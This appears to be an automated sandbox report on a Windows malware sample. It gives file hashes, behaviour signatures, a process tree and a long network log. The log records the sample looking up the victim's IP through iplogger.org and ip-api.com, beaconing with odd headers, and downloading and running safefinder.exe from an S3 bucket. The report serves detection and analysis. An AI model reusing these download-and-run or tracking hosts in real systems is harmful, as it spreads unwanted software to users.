Resubmissions

03/07/2024, 22:59 UTC

240703-2yn7wszhlp 10

03/07/2024, 16:13 UTC

240703-tn93lsyglf 10

03/07/2024, 16:11 UTC

240703-tm84xsyfma 10

10/05/2024, 16:25 UTC

240510-tw1h5shh47 10

24/08/2023, 11:16 UTC

230824-nda8msdf8z 10

Analysis

  • max time kernel
    141s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03/07/2024, 16:11 UTC

General

  • Target

    Archive.zip__ccacaxs2tbz2t6ob3e.exe

  • Size

    430KB

  • MD5

    a3cab1a43ff58b41f61f8ea32319386b

  • SHA1

    94689e1a9e1503f1082b23e6d5984d4587f3b9ec

  • SHA256

    005d3b2b78fa134092a43e53112e5c8518f14cf66e57e6a3cc723219120baba6

  • SHA512

    8f084a866c608833c3bf95b528927d9c05e8d4afcd8a52c3434d45c8ba8220c25d2f09e00aade708bbbc83b4edea60baf826750c529e8e9e05b1242c56d0198d

  • SSDEEP

    6144:vU9Q9tD5WuDQa4t3BMgLkzvCOnYxcEaSAOPou8BWinO8DR:8Q9tD5WyQlBBVAnYxRhr8DR

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe
    "C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"
    PID:4756 (depth 1)
    • Suspicious use of WriteProcessMemory
    • C:\Users\Admin\AppData\Local\Temp\7C73.tmp.exe
      C:\Users\Admin\AppData\Local\Temp\7C73.tmp.exe
      PID:3652 (depth 2, child of PID 4756)
      • Executes dropped EXE

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    domainht6.ml
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    8.8.8.8:53
    Request
    domainht6.ml
    IN A
    Response
  • flag-us
    DNS
    iplogger.org
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    8.8.8.8:53
    Request
    iplogger.org
    IN A
    Response
    iplogger.org
    IN A
    104.21.4.208
    iplogger.org
    IN A
    172.67.132.113
  • flag-us
    GET
    http://iplogger.org/1Wnwe7
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    104.21.4.208:80
    Request
    GET /1Wnwe7 HTTP/1.1
    Content-Type: text/html
    Khsopeyrkdmva: hoemckleka
    User-Agent: krldn
    Host: iplogger.org
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 03 Jul 2024 16:14:11 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Location: https://iplogger.org/1Wnwe7#80
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4Cr3TxxzIR1OnaxVjQQUyyIxZb3DDaMt7fu3S5FxgCnfLxfVHSs3209iG3XZvHY5TcRJtEGbJ%2F6onYCkbnTmgFDSj3ap%2BDXnejJmL5HJVg8mb1xs2W8a9mU0R8D1iI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89d82acb8884776e-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://iplogger.org/1Wnwe7
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    104.21.4.208:443
    Request
    GET /1Wnwe7 HTTP/1.1
    Khsopeyrkdmva: hoemckleka
    User-Agent: krldn
    Cache-Control: no-cache
    Host: iplogger.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 03 Jul 2024 16:14:12 GMT
    Content-Type: image/png
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: 170542143211120935=1; expires=Thu, 03 Jul 2025 16:14:12 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
    set-cookie: clhf03028ja=191.101.209.39; expires=Thu, 03 Jul 2025 16:14:12 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
    memory: 0.41156768798828125
    expires: Wed, 03 Jul 2024 16:14:12 +0000
    Cache-Control: no-store, no-cache, must-revalidate
    strict-transport-security: max-age=31536000
    x-frame-options: SAMEORIGIN
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ZLBK4bZg0dIIQqFhhxzrZsoq0QePRCor3IMUWKiEczwD%2BNzW7jBuKNugpPbrUV4ssvmzaUkd6pbFzSxY1sLazalFQ0%2FKGiuG7tz1f%2B5ioyZ3NuRqiBuTN5WAm3zua4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89d82aceae39d16c-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    x2.c.lencr.org
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    8.8.8.8:53
    Request
    x2.c.lencr.org
    IN A
    Response
    x2.c.lencr.org
    IN CNAME
    crl.root-x1.letsencrypt.org.edgekey.net
    crl.root-x1.letsencrypt.org.edgekey.net
    IN CNAME
    e8652.dscx.akamaiedge.net
    e8652.dscx.akamaiedge.net
    IN A
    23.55.97.11
  • flag-be
    GET
    http://x2.c.lencr.org/
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    23.55.97.11:80
    Request
    GET / HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: x2.c.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/pkix-crl
    Last-Modified: Mon, 12 Feb 2024 22:07:27 GMT
    ETag: "65ca969f-12b"
    Cache-Control: max-age=3600
    Expires: Wed, 03 Jul 2024 17:14:12 GMT
    Date: Wed, 03 Jul 2024 16:14:12 GMT
    Content-Length: 299
    Connection: keep-alive
  • flag-us
    DNS
    ip-api.com
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/xml
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /xml HTTP/1.1
    Content-Type: text/html
    Khsopeyrkdmva: hoemckleka
    User-Agent: krldn
    Host: ip-api.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Wed, 03 Jul 2024 16:14:11 GMT
    Content-Type: application/xml; charset=utf-8
    Content-Length: 457
    Access-Control-Allow-Origin: *
    X-Ttl: 47
    X-Rl: 43
  • flag-us
    DNS
    google-analytics.com
    7C73.tmp.exe
    Remote address:
    8.8.8.8:53
    Request
    google-analytics.com
    IN A
    Response
    google-analytics.com
    IN A
    172.217.169.4
  • flag-us
    DNS
    140.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    140.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.97.55.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.97.55.23.in-addr.arpa
    IN PTR
    Response
    11.97.55.23.in-addr.arpa
    IN PTR
    a23-55-97-11.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    208.4.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    208.4.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-api.com
  • flag-gb
    POST
    http://google-analytics.com/collect
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    172.217.169.4:80
    Request
    POST /collect HTTP/1.1
    Content-Type: text/html
    Gkjfdshfkjjd: dsdjdsjdhv
    User-Agent: jdlnb
    Host: google-analytics.com
    Content-Length: 98
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: *
    Date: Wed, 03 Jul 2024 16:14:12 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-cache, no-store, must-revalidate
    Last-Modified: Sun, 17 May 1998 03:00:00 GMT
    X-Content-Type-Options: nosniff
    Content-Type: image/gif
    Cross-Origin-Resource-Policy: cross-origin
    Server: Golfe2
    Content-Length: 35
  • flag-gb
    POST
    http://google-analytics.com/collect
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    172.217.169.4:80
    Request
    POST /collect HTTP/1.1
    Content-Type: text/html
    Gkjfdshfkjjd: dsdjdsjdhv
    User-Agent: jdlnb
    Host: google-analytics.com
    Content-Length: 91
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: *
    Date: Wed, 03 Jul 2024 16:14:13 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-cache, no-store, must-revalidate
    Last-Modified: Sun, 17 May 1998 03:00:00 GMT
    X-Content-Type-Options: nosniff
    Content-Type: image/gif
    Cross-Origin-Resource-Policy: cross-origin
    Server: Golfe2
    Content-Length: 35
  • flag-us
    DNS
    osdsoft.com
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    8.8.8.8:53
    Request
    osdsoft.com
    IN A
    Response
    osdsoft.com
    IN A
    103.224.182.253
  • flag-us
    GET
    http://osdsoft.com/20190118/things.xml
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    103.224.182.253:80
    Request
    GET /20190118/things.xml HTTP/1.1
    Content-Type: text/html
    Khsopeyrkdmva: hoemckleka
    User-Agent: krldn
    Host: osdsoft.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    date: Wed, 03 Jul 2024 16:14:12 GMT
    server: Apache
    set-cookie: __tad=1720023252.4485212; expires=Sat, 01-Jul-2034 16:14:12 GMT; Max-Age=315360000
    location: http://ww38.osdsoft.com/20190118/things.xml
    content-length: 2
    content-type: text/html; charset=UTF-8
    connection: close
  • flag-us
    DNS
    ww38.osdsoft.com
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    8.8.8.8:53
    Request
    ww38.osdsoft.com
    IN A
    Response
    ww38.osdsoft.com
    IN CNAME
    756471.parkingcrew.net
    756471.parkingcrew.net
    IN A
    76.223.26.96
    756471.parkingcrew.net
    IN A
    13.248.148.254
  • flag-us
    GET
    http://ww38.osdsoft.com/20190118/things.xml
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    76.223.26.96:80
    Request
    GET /20190118/things.xml HTTP/1.1
    Khsopeyrkdmva: hoemckleka
    User-Agent: krldn
    Cache-Control: no-cache
    Host: ww38.osdsoft.com
    Connection: Keep-Alive
    Cookie: __tad=1720023252.4485212
    Response
    HTTP/1.1 200 OK
    Date: Wed, 03 Jul 2024 16:14:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Server: nginx
    Vary: Accept-Encoding
    Vary: Accept-Encoding
    X-Redirect: skenzo
    X-Buckets: bucket011
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_g/5eci+3ZqFjyQa9R7jEoAkh3eKd9EG8CZPmuyoh+GAffdjf8d6BEnidEATz5OVLEloYY65lROuFnrAcTO3ZqQ==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
    X-Domain: osdsoft.com
    X-Subdomain: ww38
  • flag-us
    DNS
    4.169.217.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.169.217.172.in-addr.arpa
    IN PTR
    Response
    4.169.217.172.in-addr.arpa
    IN PTR
    lhr25s26-in-f4.1e100.net
  • flag-us
    DNS
    linkury.s3-us-west-2.amazonaws.com
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    8.8.8.8:53
    Request
    linkury.s3-us-west-2.amazonaws.com
    IN A
    Response
    linkury.s3-us-west-2.amazonaws.com
    IN CNAME
    s3-r-w.us-west-2.amazonaws.com
    s3-r-w.us-west-2.amazonaws.com
    IN A
    52.92.180.146
    s3-r-w.us-west-2.amazonaws.com
    IN A
    3.5.78.13
    s3-r-w.us-west-2.amazonaws.com
    IN A
    3.5.82.178
    s3-r-w.us-west-2.amazonaws.com
    IN A
    3.5.78.4
    s3-r-w.us-west-2.amazonaws.com
    IN A
    3.5.85.10
    s3-r-w.us-west-2.amazonaws.com
    IN A
    3.5.85.80
    s3-r-w.us-west-2.amazonaws.com
    IN A
    3.5.82.217
    s3-r-w.us-west-2.amazonaws.com
    IN A
    52.92.192.162
  • flag-us
    GET
    https://linkury.s3-us-west-2.amazonaws.com/safefinder.exe
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    52.92.180.146:443
    Request
    GET /safefinder.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: linkury.s3-us-west-2.amazonaws.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    x-amz-id-2: gn9cn4fqQKdN5qT2V1m8roNLLO4u+2keYebSSx7L2dAa553A/Go9b5vXmEqKFCErQmkD0GLWejs=
    x-amz-request-id: 9QAA0Q707K4XQTHT
    Date: Wed, 03 Jul 2024 16:14:15 GMT
    Last-Modified: Mon, 13 Apr 2020 13:31:09 GMT
    ETag: "060404f288040959694844afbd102966"
    Accept-Ranges: bytes
    Content-Type: application/x-msdownload
    Server: AmazonS3
    Content-Length: 152576
  • flag-us
    DNS
    ocsp.r2m01.amazontrust.com
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    8.8.8.8:53
    Request
    ocsp.r2m01.amazontrust.com
    IN A
    Response
    ocsp.r2m01.amazontrust.com
    IN A
    143.204.67.183
  • flag-gb
    GET
    http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAOYNuhX0tUwfbfwv1lp%2BP4%3D
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    Remote address:
    143.204.67.183:80
    Request
    GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAOYNuhX0tUwfbfwv1lp%2BP4%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: ocsp.r2m01.amazontrust.com
    Response
    HTTP/1.1 200 OK
    Content-Type: application/ocsp-response
    Content-Length: 471
    Connection: keep-alive
    Accept-Ranges: bytes
    Cache-Control: max-age=7200
    Date: Wed, 03 Jul 2024 14:44:48 GMT
    Last-Modified: Wed, 03 Jul 2024 14:44:48 GMT
    Server: ECAcc (lhd/35E6)
    X-Cache: Hit from cloudfront
    Via: 1.1 aa5f00ed95fd16b8d894989f7ad491ba.cloudfront.net (CloudFront)
    X-Amz-Cf-Pop: LHR61-P1
    X-Amz-Cf-Id: N5aD9V2TrUyGkk8XEZjP4DZLzL9DDcKxqrgaRlh9V3ENulIqP7BT_A==
    Age: 5366
  • flag-us
    DNS
    253.182.224.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    253.182.224.103.in-addr.arpa
    IN PTR
    Response
    253.182.224.103.in-addr.arpa
    IN PTR
    lb-182-253.above.com
  • flag-us
    DNS
    96.26.223.76.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    96.26.223.76.in-addr.arpa
    IN PTR
    Response
    96.26.223.76.in-addr.arpa
    IN PTR
    aba1c1ff9d2ec5376.awsglobalaccelerator.com
  • flag-us
    DNS
    190.178.204.143.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    190.178.204.143.in-addr.arpa
    IN PTR
    Response
    190.178.204.143.in-addr.arpa
    IN PTR
    server-143-204-178-190.lhr50.r.cloudfront.net
  • flag-us
    DNS
    146.180.92.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    146.180.92.52.in-addr.arpa
    IN PTR
    Response
    146.180.92.52.in-addr.arpa
    IN PTR
    s3-us-west-2-r-w.amazonaws.com
  • flag-us
    DNS
    113.216.138.108.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    113.216.138.108.in-addr.arpa
    IN PTR
    Response
    113.216.138.108.in-addr.arpa
    IN PTR
    server-108-138-216-113.lhr61.r.cloudfront.net
  • flag-us
    DNS
    183.67.204.143.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.67.204.143.in-addr.arpa
    IN PTR
    Response
    183.67.204.143.in-addr.arpa
    IN PTR
    server-143-204-67-183.lhr61.r.cloudfront.net
  • flag-gb
    POST
    http://google-analytics.com/collect
    7C73.tmp.exe
    Remote address:
    172.217.169.4:80
    Request
    POST /collect HTTP/1.1
    Content-Type: text/html
    Gkjfdshfkjjd: dsdjdsjdhv
    User-Agent: jdlnb
    Host: google-analytics.com
    Content-Length: 96
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: *
    Date: Wed, 03 Jul 2024 16:14:15 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-cache, no-store, must-revalidate
    Last-Modified: Sun, 17 May 1998 03:00:00 GMT
    X-Content-Type-Options: nosniff
    Content-Type: image/gif
    Cross-Origin-Resource-Policy: cross-origin
    Server: Golfe2
    Content-Length: 35
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    92.12.20.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    92.12.20.2.in-addr.arpa
    IN PTR
    Response
    92.12.20.2.in-addr.arpa
    IN PTR
    a2-20-12-92.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    203.107.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    203.107.17.2.in-addr.arpa
    IN PTR
    Response
    203.107.17.2.in-addr.arpa
    IN PTR
    a2-17-107-203.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.111.78.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.111.78.13.in-addr.arpa
    IN PTR
    Response
  • 104.21.4.208:80
    http://iplogger.org/1Wnwe7
    http
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    462 B
    1.0kB
    7
    5

    HTTP Request

    GET http://iplogger.org/1Wnwe7

    HTTP Response

    301
  • 104.21.4.208:443
    https://iplogger.org/1Wnwe7
    tls, http
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    1.1kB
    6.6kB
    14
    10

    HTTP Request

    GET https://iplogger.org/1Wnwe7

    HTTP Response

    200
  • 23.55.97.11:80
    http://x2.c.lencr.org/
    http
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    391 B
    760 B
    6
    4

    HTTP Request

    GET http://x2.c.lencr.org/

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/xml
    http
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    319 B
    765 B
    4
    3

    HTTP Request

    GET http://ip-api.com/xml

    HTTP Response

    200
  • 172.217.169.4:80
    http://google-analytics.com/collect
    http
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    889 B
    1.1kB
    8
    6

    HTTP Request

    POST http://google-analytics.com/collect

    HTTP Response

    200

    HTTP Request

    POST http://google-analytics.com/collect

    HTTP Response

    200
  • 103.224.182.253:80
    http://osdsoft.com/20190118/things.xml
    http
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    428 B
    478 B
    6
    4

    HTTP Request

    GET http://osdsoft.com/20190118/things.xml

    HTTP Response

    302
  • 76.223.26.96:80
    http://ww38.osdsoft.com/20190118/things.xml
    http
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    840 B
    8.7kB
    14
    13

    HTTP Request

    GET http://ww38.osdsoft.com/20190118/things.xml

    HTTP Response

    200
  • 52.92.180.146:443
    https://linkury.s3-us-west-2.amazonaws.com/safefinder.exe
    tls, http
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    6.8kB
    164.8kB
    134
    130

    HTTP Request

    GET https://linkury.s3-us-west-2.amazonaws.com/safefinder.exe

    HTTP Response

    200
  • 143.204.67.183:80
    http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAOYNuhX0tUwfbfwv1lp%2BP4%3D
    http
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    521 B
    1.2kB
    6
    5

    HTTP Request

    GET http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAOYNuhX0tUwfbfwv1lp%2BP4%3D

    HTTP Response

    200
  • 172.217.169.4:80
    http://google-analytics.com/collect
    http
    7C73.tmp.exe
    541 B
    589 B
    6
    4

    HTTP Request

    POST http://google-analytics.com/collect

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    domainht6.ml
    dns
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    58 B
    116 B
    1
    1

    DNS Request

    domainht6.ml

  • 8.8.8.8:53
    iplogger.org
    dns
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    58 B
    90 B
    1
    1

    DNS Request

    iplogger.org

    DNS Response

    104.21.4.208
    172.67.132.113

  • 8.8.8.8:53
    x2.c.lencr.org
    dns
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    60 B
    165 B
    1
    1

    DNS Request

    x2.c.lencr.org

    DNS Response

    23.55.97.11

  • 8.8.8.8:53
    ip-api.com
    dns
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    google-analytics.com
    dns
    7C73.tmp.exe
    66 B
    82 B
    1
    1

    DNS Request

    google-analytics.com

    DNS Response

    172.217.169.4

  • 8.8.8.8:53
    140.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    140.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    11.97.55.23.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    11.97.55.23.in-addr.arpa

  • 8.8.8.8:53
    208.4.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    208.4.21.104.in-addr.arpa

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
    95 B
    1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    osdsoft.com
    dns
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    57 B
    73 B
    1
    1

    DNS Request

    osdsoft.com

    DNS Response

    103.224.182.253

  • 8.8.8.8:53
    ww38.osdsoft.com
    dns
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    62 B
    130 B
    1
    1

    DNS Request

    ww38.osdsoft.com

    DNS Response

    76.223.26.96
    13.248.148.254

  • 8.8.8.8:53
    4.169.217.172.in-addr.arpa
    dns
    72 B
    110 B
    1
    1

    DNS Request

    4.169.217.172.in-addr.arpa

  • 8.8.8.8:53
    linkury.s3-us-west-2.amazonaws.com
    dns
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    80 B
    239 B
    1
    1

    DNS Request

    linkury.s3-us-west-2.amazonaws.com

    DNS Response

    52.92.180.146
    3.5.78.13
    3.5.82.178
    3.5.78.4
    3.5.85.10
    3.5.85.80
    3.5.82.217
    52.92.192.162

  • 8.8.8.8:53
    ocsp.r2m01.amazontrust.com
    dns
    Archive.zip__ccacaxs2tbz2t6ob3e.exe
    72 B
    88 B
    1
    1

    DNS Request

    ocsp.r2m01.amazontrust.com

    DNS Response

    143.204.67.183

  • 8.8.8.8:53
    253.182.224.103.in-addr.arpa
    dns
    74 B
    108 B
    1
    1

    DNS Request

    253.182.224.103.in-addr.arpa

  • 8.8.8.8:53
    96.26.223.76.in-addr.arpa
    dns
    71 B
    127 B
    1
    1

    DNS Request

    96.26.223.76.in-addr.arpa

  • 8.8.8.8:53
    190.178.204.143.in-addr.arpa
    dns
    74 B
    133 B
    1
    1

    DNS Request

    190.178.204.143.in-addr.arpa

  • 8.8.8.8:53
    146.180.92.52.in-addr.arpa
    dns
    72 B
    116 B
    1
    1

    DNS Request

    146.180.92.52.in-addr.arpa

  • 8.8.8.8:53
    113.216.138.108.in-addr.arpa
    dns
    74 B
    133 B
    1
    1

    DNS Request

    113.216.138.108.in-addr.arpa

  • 8.8.8.8:53
    183.67.204.143.in-addr.arpa
    dns
    73 B
    131 B
    1
    1

    DNS Request

    183.67.204.143.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    92.12.20.2.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    92.12.20.2.in-addr.arpa

  • 8.8.8.8:53
    203.107.17.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    203.107.17.2.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    198.111.78.13.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    198.111.78.13.in-addr.arpa

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\7C73.tmp.exe

    Filesize

    149KB

    MD5

    060404f288040959694844afbd102966

    SHA1

    e0525e9ef6713fd7f269a669335ce3ddaab4b6a1

    SHA256

    40517e822f3442a2f389a50e905f40a6a2c4930077c865e3ea7b1929405f760a

    SHA512

